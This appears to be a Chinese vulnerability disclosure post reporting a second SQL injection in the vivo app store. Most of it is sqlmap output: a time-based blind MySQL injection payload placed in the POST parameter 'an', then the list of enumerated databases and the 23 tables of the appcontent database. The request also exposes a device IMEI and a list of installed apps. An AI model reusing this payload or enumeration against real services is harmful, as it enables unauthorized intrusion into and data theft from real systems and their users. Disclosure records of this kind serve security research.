vivo应用商店又一处SQL注入（从哪里跌倒从哪里爬起来 ）

---
Parameter: an (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: nt=WIFI&model=vivo X5Max+&packages=com.tencent.mm|760|,com.vlife.vivo.wallpaper|559|,cn.wps.moffice_eng|149|,net.openvpn.openvpn|74|,com.naver.linewebtoon|151101|,com.qiyi.video|88|,com.baidu.BaiduMap|740|,com.dmm.games.touken|32|,com.baidu.appsearch|16787600|,com.easyovpn.easyovpn|150827263|,com.tudou.android|65|,com.windfindtech.ishanghai|22|,com.tencent.mobileqq|348|,com.huati|20141238|,com.google.android.syncadapters.calendar|16|,com.sankuai.meituan|361|,kvpioneer.safecenter|6|,com.taobao.taobao|131|,com.bbk.appstore|622|,com.vivo.game|38|,com.vivo.browser|4420|,com.android.browser|59999|,com.chaozh.iReader|431|,com.vivo.space|13|&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4' AND (SELECT * FROM (SELECT(SLEEP(5)))ghSA) AND 'LGGj'='LGGj&dbversion=0&s=2|4273816697
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] appcontent
[*] information_schema
[*] test

Database: appcontent
[23 tables]
+-----------------------------+
| :ec_manual_catch_apk       |
| comment_tmp                 |
| t_ac_apk_url                |
| t_ac_app_info               |
| t_ac_app_info_all           |
| t_ac_app_info_hot           |
| t_ac_app_s                  |
| t_ac_app_screenshot         |
| t_ac_fail_catch_app         |
| t_ac_manual_update_apk      |
| t_ac_single_download        |
| t_ac_spider_detail_q        |
| t_ac_spider_detail_template |
| t_ac_spider_list_task       |
| t_ac_spider_list_template   |
| t_ac_wdj_icon               |
| t_activity_info             |
| t_ad_app                    |
| t_ad_click                  |
| t_ad_icon                   |
| t_ad_info                   |
| t_android_permission        |
| t_apk_delete                |
+-----------------------------+